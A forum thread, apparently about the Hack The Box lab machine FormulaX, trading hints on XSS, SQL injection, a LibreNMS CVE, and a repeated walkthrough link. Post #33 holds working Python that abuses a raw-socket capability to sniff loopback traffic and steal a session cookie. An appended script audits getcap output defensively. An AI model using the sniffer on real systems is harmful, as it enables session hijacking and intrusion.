HTB - FormulaX
by paven - Saturday March 9, 2024 at 12:54 PM
#31
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?
[/quote]

Here is the walkthrough video: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here, any hint for becoming admin

found a sqli but can't dump the db, only current_user, hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
Reply
#32
(Mar 11, 2024, 06:16 AM)dolare141 Wrote:
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?

Here is the walkthrough video: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here, any hint for becoming admin

found a sqli but can't dump the db, only current_user, hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]

ty for the help
Reply
#33
Here is my method to get librenms from www-data.

/usr/bin/python3.10 has the cap_net_raw capability, so you can sniff on a raw socket.

Just download the pcap and dpkt pip packages on your local box, make an archive, and upload it to the box in the same directory as the following code.

It will dump the TCP port 3000 traffic, and you can get the cookie to log in to the librenms web interface.

import pcap
import dpkt

def decode_tcp(packet):
    # Parse the Ethernet frame; return the TCP payload if it is bound for port 3000.
    eth = dpkt.ethernet.Ethernet(packet)

    if not isinstance(eth.data, dpkt.ip.IP):
        return None

    ip = eth.data

    if not isinstance(ip.data, dpkt.tcp.TCP):
        return None

    tcp = ip.data

    if tcp.dport == 3000:
        return tcp.data

    return None

def main():
    interface = 'lo'  # Change to your interface
    pc = pcap.pcap(name=interface,  promisc=True,  immediate=True)

    for timestamp, packet in pc:
        data = decode_tcp(packet)
        if data:
            print("Received TCP packet on port 3000:")
            print(data.decode('utf-8', 'ignore'))

if __name__ == "__main__":
    main()
Reply
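
From the defender's side, the condition post #33 depends on (a file capability set on a general-purpose interpreter) can be caught by auditing getcap output. This is an added example, not part of the original thread; the interpreter name list and the SAMPLE lines are constructed assumptions.

```python
import re
import shutil
import subprocess

# Interpreters run arbitrary user code, so a file capability on one is
# effectively granted to every local user who can execute it.
INTERPRETER = re.compile(r"/(python|perl|ruby|node|php|lua)[\w.-]*$")
# getcap prints "path cap_a,cap_b=ep" (libcap >= 2.41) or "path = cap_a+ep" (older).
LINE = re.compile(r"^(?P<path>.+?)\s+(?:=\s+)?(?P<caps>cap_\S.*)$")
CLAUSE = re.compile(r"^(?P<names>[a-z_,]+)[=+](?P<flags>[eip]*)$")


def parse_getcap(output):
    """Return {path: set of capabilities in the permitted or effective set}."""
    result = {}
    for line in output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        caps = set()
        for clause in m.group("caps").split():
            c = CLAUSE.match(clause)
            # Inheritable-only clauses ("=i") grant nothing on exec by themselves.
            if c and set(c.group("flags")) & {"e", "p"}:
                caps.update(c.group("names").split(","))
        if caps:
            result[m.group("path")] = caps
    return result


def risky_interpreters(output):
    """Return sorted (path, capabilities) pairs for interpreters holding capabilities."""
    return sorted((p, sorted(c)) for p, c in parse_getcap(output).items()
                  if INTERPRETER.search(p))


# Constructed sample covering both getcap output formats.
SAMPLE = """\
/usr/bin/python3.10 cap_net_raw=ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl5.34.0 cap_setuid,cap_net_bind_service+ep
/opt/tools/node cap_net_admin=i
"""

if __name__ == "__main__":
    # Live scan if getcap (libcap2-bin) is installed, else the constructed sample.
    out = SAMPLE
    if shutil.which("getcap"):
        out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    for path, caps in risky_interpreters(out):
        print(f"{path}: {','.join(caps)}  -> remove with: setcap -r {path}")
```

Binaries such as ping legitimately carry cap_net_raw and are parsed but not reported; only interpreters are flagged.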
#34
thanks for sharing the tips :-)
Reply
#35
(Mar 11, 2024, 06:16 AM)dolare141 Wrote:
(Mar 10, 2024, 11:46 PM)sus11 Wrote: The chatbot is a rabbit hole; Contact.html is the real path, try all fields until you get your XSS

can you help with the xss?

Here is the walkthrough video: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 08:43 PM)geoblitz Wrote: Any help with root?

Here is the walkthrough video if you still need help: https://youtu.be/e4g3_cNU6do

(Mar 10, 2024, 01:56 PM)Th35t0rm Wrote: same here, any hint for becoming admin

found a sqli but can't dump the db, only current_user, hostname and dbs works
https://huntr.com/bounties/54813d42-5b93...9d2cbf090/

Still stuck? Watch the video here: https://youtu.be/e4g3_cNU6do
[/quote]

after got message connected but does need setting the netcat to listen or something to move to root
Reply
#36
How can I become admin on librenms? I tried CVE-2023-5591 but I can't make it work...
Reply
#37
rooted.
Insane for me but rooted at all.
PM for hints
Reply

